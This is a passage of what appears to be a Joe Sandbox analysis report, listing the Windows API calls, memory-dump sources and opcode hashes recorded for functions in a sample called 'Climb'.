                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$DestroyWindow
                                                                                                                                                                          • String ID: msctls_updown32
                                                                                                                                                                          • API String ID: 4014797782-2298589950
                                                                                                                                                                          • Opcode ID: 884eae6c4703ad432749ff69b93c7cee23f4ca4379a6fa7f51f125c2888b18a8
                                                                                                                                                                          • Instruction ID: 1ca4fcdb72d3643f9f8f53385d8a46ed0c911dea2f11f467238a95ee433b24e0
                                                                                                                                                                          • Opcode Fuzzy Hash: 884eae6c4703ad432749ff69b93c7cee23f4ca4379a6fa7f51f125c2888b18a8
                                                                                                                                                                          • Instruction Fuzzy Hash: FD2192B5600609BFDB11DFA4CC85EBB37ADEB5A364B100159FA049B361CB30EC11CBA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00AF42DC
                                                                                                                                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00AF42EC
                                                                                                                                                                          • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00AF4312
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$MoveWindow
                                                                                                                                                                          • String ID: Listbox
                                                                                                                                                                          • API String ID: 3315199576-2633736733
                                                                                                                                                                          • Opcode ID: 6b8aa1a019ff6906c2156ffa69285cc64facdeb62559342df345acbaaac8a625
                                                                                                                                                                          • Instruction ID: 859cee1ac02cbf0d994ca54640e8b311d606498f967771a950f435ba353c2deb
                                                                                                                                                                          • Opcode Fuzzy Hash: 6b8aa1a019ff6906c2156ffa69285cc64facdeb62559342df345acbaaac8a625
                                                                                                                                                                          • Instruction Fuzzy Hash: E9215032615118BBEB129FD4DC85FFF3B6EEF89764F118124FA059B190CA719C5287A0
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 00AD544D
                                                                                                                                                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00AD54A1
                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,?,?,00AFDCD0), ref: 00AD5515
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorMode$InformationVolume
                                                                                                                                                                          • String ID: %lu
                                                                                                                                                                          • API String ID: 2507767853-685833217
                                                                                                                                                                          • Opcode ID: 680b6de36e95fff93a1bb1d603713b2dec7b2d9b4c4b77be222d3dae41279c11
                                                                                                                                                                          • Instruction ID: 23369355659a05cde81fae447ed9cc15c58d62871d2db458a87b74b3087bc11e
                                                                                                                                                                          • Opcode Fuzzy Hash: 680b6de36e95fff93a1bb1d603713b2dec7b2d9b4c4b77be222d3dae41279c11
                                                                                                                                                                          • Instruction Fuzzy Hash: CD315370A00109AFD711DF64C985EAA77F9EF05304F148095F509DB362DB71EE45CB61
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00AF4CED
                                                                                                                                                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00AF4D02
                                                                                                                                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00AF4D0F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                          • String ID: msctls_trackbar32
                                                                                                                                                                          • API String ID: 3850602802-1010561917
                                                                                                                                                                          • Opcode ID: a80f53f26d9a2b0e000103139b408bd61c780d851f0d99bc761ab49007ce1656
                                                                                                                                                                          • Instruction ID: de7e62a5e44c894f97b8ba9f1033ad3e4cc79b08be9acb98ed307921e8e180cd
                                                                                                                                                                          • Opcode Fuzzy Hash: a80f53f26d9a2b0e000103139b408bd61c780d851f0d99bc761ab49007ce1656
                                                                                                                                                                          • Instruction Fuzzy Hash: CE11E07124024CBEEF219FA9DC06FBB3BA8EF89B64F110514FA55E60A0D671DC619B20
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A68577: _wcslen.LIBCMT ref: 00A6858A
                                                                                                                                                                            • Part of subcall function 00AC36F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00AC3712
                                                                                                                                                                            • Part of subcall function 00AC36F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AC3723
                                                                                                                                                                            • Part of subcall function 00AC36F4: GetCurrentThreadId.KERNEL32 ref: 00AC372A
                                                                                                                                                                            • Part of subcall function 00AC36F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00AC3731
                                                                                                                                                                          • GetFocus.USER32 ref: 00AC38C4
                                                                                                                                                                            • Part of subcall function 00AC373B: GetParent.USER32(00000000), ref: 00AC3746
                                                                                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00AC390F
                                                                                                                                                                          • EnumChildWindows.USER32(?,00AC3987), ref: 00AC3937
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                          • String ID: %s%d
                                                                                                                                                                          • API String ID: 1272988791-1110647743
                                                                                                                                                                          • Opcode ID: a83540db4adc7d55b95bce7cb30b824ebaad5774a63874e06f8104472a8c7cc8
                                                                                                                                                                          • Instruction ID: bae33b7f99755081e9af8979c4aa4fd4f020e1da26cb86a159fe54eb8cd8e260
                                                                                                                                                                          • Opcode Fuzzy Hash: a83540db4adc7d55b95bce7cb30b824ebaad5774a63874e06f8104472a8c7cc8
                                                                                                                                                                          • Instruction Fuzzy Hash: 4E11A872600205ABCF11BFB49D95FFD77BAAF94304F058069F9099B252DE705905DB20
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00AF6360
                                                                                                                                                                          • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00AF638D
                                                                                                                                                                          • DrawMenuBar.USER32(?), ref: 00AF639C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Menu$InfoItem$Draw
                                                                                                                                                                          • String ID: 0
                                                                                                                                                                          • API String ID: 3227129158-4108050209
                                                                                                                                                                          • Opcode ID: 27055ae8f9b38f414f38b3b6021490bdc6cc685fc5c2652ea8aca5e8b2b183ba
                                                                                                                                                                          • Instruction ID: 8926362c603d9f7ab4e33fe076ab03bcb5caf1ea0a21cdb8964d3b6d835a33f5
                                                                                                                                                                          • Opcode Fuzzy Hash: 27055ae8f9b38f414f38b3b6021490bdc6cc685fc5c2652ea8aca5e8b2b183ba
                                                                                                                                                                          • Instruction Fuzzy Hash: C501C032500208AFDB119F90DC88FBEBBB5FF45314F108199F909DA150CB308A85EF21
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00ABE797
                                                                                                                                                                          • FreeLibrary.KERNEL32 ref: 00ABE7BD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressFreeLibraryProc
                                                                                                                                                                          • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                          • API String ID: 3013587201-2590602151
                                                                                                                                                                          • Opcode ID: 7318d5050fc19ceba91453fa127b7678077b51d2f19551e06e611c81d392b012
                                                                                                                                                                          • Instruction ID: 2c82202368e3bd9d1b83bec08d2c8e284f52cc8787502f7b8b1b1a8c54334a13
                                                                                                                                                                          • Opcode Fuzzy Hash: 7318d5050fc19ceba91453fa127b7678077b51d2f19551e06e611c81d392b012
                                                                                                                                                                          • Instruction Fuzzy Hash: 02E022718026219FD733C7A04C98EF9333D6F20B00B2446A8FC06E6052EB30CD84CA98
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 35982bc8a07f4b0deaa102f44e96d1b92fc794d77b783a56eb60b5a6705b9539
                                                                                                                                                                          • Instruction ID: fb2509f85372b7a662945857d64cd6548d1a2ab812d7816e45dc363de7ff3875
                                                                                                                                                                          • Opcode Fuzzy Hash: 35982bc8a07f4b0deaa102f44e96d1b92fc794d77b783a56eb60b5a6705b9539
                                                                                                                                                                          • Instruction Fuzzy Hash: 03C14975A0021AEFDB14CF98C894FAAB7B5FF48704F128598E506EB251D731EE81DB90
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __alldvrm$_strrchr
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1036877536-0
                                                                                                                                                                          • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                          • Instruction ID: a858aebb6de8b251f358345b1ec61f54d43f4ae8dc1689c7bb4a58c0b7cd8924
                                                                                                                                                                          • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                          • Instruction Fuzzy Hash: 95A14772B007869FEF21CF28C891FAEBBE4EF59314F2442A9E5959F281D3349942C750
                                                                                                                                                                          APIs
                                                                                                                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00B00BD4,?), ref: 00AC0EE0
                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00B00BD4,?), ref: 00AC0EF8
                                                                                                                                                                          • CLSIDFromProgID.OLE32(?,?,00000000,00AFDCE0,000000FF,?,00000000,00000800,00000000,?,00B00BD4,?), ref: 00AC0F1D
                                                                                                                                                                          • _memcmp.LIBVCRUNTIME ref: 00AC0F3E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 314563124-0
                                                                                                                                                                          • Opcode ID: 7fc0eeb53540b41bee790a5bbe2fb9bc72a3609cf38ac6124258ef943a0031e2
                                                                                                                                                                          • Instruction ID: 61120db2b4660fd0d27516bb7360ecd1c47d7c1788e26003ab871cd77773136c
                                                                                                                                                                          • Opcode Fuzzy Hash: 7fc0eeb53540b41bee790a5bbe2fb9bc72a3609cf38ac6124258ef943a0031e2
                                                                                                                                                                          • Instruction Fuzzy Hash: 13811771A00109EFCB14DFD8C984EEEB7B9FF89315F214598E506AB250DB71AE46CB60
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00AEB10C
                                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00AEB11A
                                                                                                                                                                            • Part of subcall function 00A6B329: _wcslen.LIBCMT ref: 00A6B333
                                                                                                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 00AEB1FC
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00AEB20B
                                                                                                                                                                            • Part of subcall function 00A7E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00AA4D73,?), ref: 00A7E395
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1991900642-0
                                                                                                                                                                          • Opcode ID: 11e5b9da9dd0dd2d80b645225b7046d3c7b6cb9c096ed2492bad1923263be965
                                                                                                                                                                          • Instruction ID: 217729017b19c969185cc5928059dfd4038fe6b014cfd6f5354a858b10e2ccc6
                                                                                                                                                                          • Opcode Fuzzy Hash: 11e5b9da9dd0dd2d80b645225b7046d3c7b6cb9c096ed2492bad1923263be965
                                                                                                                                                                          • Instruction Fuzzy Hash: 895149B1518300AFD310EF24C986A6BBBF8FF88754F40891DF58997261EB30D905CBA2
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                          • Opcode ID: 8033595bf1dadb8411e30a8a6d70b0eaece3a29c8cd2446f1481049945111c60
                                                                                                                                                                          • Instruction ID: 059510c3afd3c828ab600aa98cf4a60174ae15eb843561f2f8c9491728bc4dc2
                                                                                                                                                                          • Opcode Fuzzy Hash: 8033595bf1dadb8411e30a8a6d70b0eaece3a29c8cd2446f1481049945111c60
                                                                                                                                                                          • Instruction Fuzzy Hash: 3041F231A00151BADB217BB98D86ABE3AE4EF5B770F140625F818E71D1EB39494187A1
                                                                                                                                                                          APIs
                                                                                                                                                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 00AE255A
                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 00AE2568
                                                                                                                                                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00AE25E7
                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 00AE25F1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$socket
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1881357543-0
                                                                                                                                                                          • Opcode ID: c3badd3ac8d167a895340b31b5bcc4119e30388cbd842528df6e3c79418f2375
                                                                                                                                                                          • Instruction ID: 8e3737aa72220c4b70d628ca5fa507ee51e1e41e20c7b363b5d61bfff28f0e69
                                                                                                                                                                          • Opcode Fuzzy Hash: c3badd3ac8d167a895340b31b5bcc4119e30388cbd842528df6e3c79418f2375
                                                                                                                                                                          • Instruction Fuzzy Hash: 1141D375A00200AFE721EF64C986F2A77E9EB04758F54C558F91A8F2D2D772ED42CB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetWindowRect.USER32(0108F2E0,?), ref: 00AF6D1A
                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00AF6D4D
                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00AF6DBA
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3880355969-0
                                                                                                                                                                          • Opcode ID: b2541c4710a20702be80fb8bf2b89f8de78eaed62864630a4905cac11c7ed633
                                                                                                                                                                          • Instruction ID: 7faf8f2b61c94edaf7f0675883e461bf91802b7d992de9d69a8ea50571fd4827
                                                                                                                                                                          • Opcode Fuzzy Hash: b2541c4710a20702be80fb8bf2b89f8de78eaed62864630a4905cac11c7ed633
                                                                                                                                                                          • Instruction Fuzzy Hash: 04513D75A00609EFCF24DFA4D980ABE7BB6FF44360F208159FA159B290DB30AD81CB50
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: b77257f5cd414d3b8c72ae10a19e539da728ee3a7f9420d4e1b17bd336d6f30b
                                                                                                                                                                          • Instruction ID: 750cbe8b5acd63dc431d71023a6efc1cc03f66f48e6037cd7974d529b57a6691
                                                                                                                                                                          • Opcode Fuzzy Hash: b77257f5cd414d3b8c72ae10a19e539da728ee3a7f9420d4e1b17bd336d6f30b
                                                                                                                                                                          • Instruction Fuzzy Hash: 7F410871B10704AFDB24AF78DE41BAABBEDEB88710F10C67AF111DB691E77199018790
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00AD61C8
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 00AD61EE
                                                                                                                                                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00AD6213
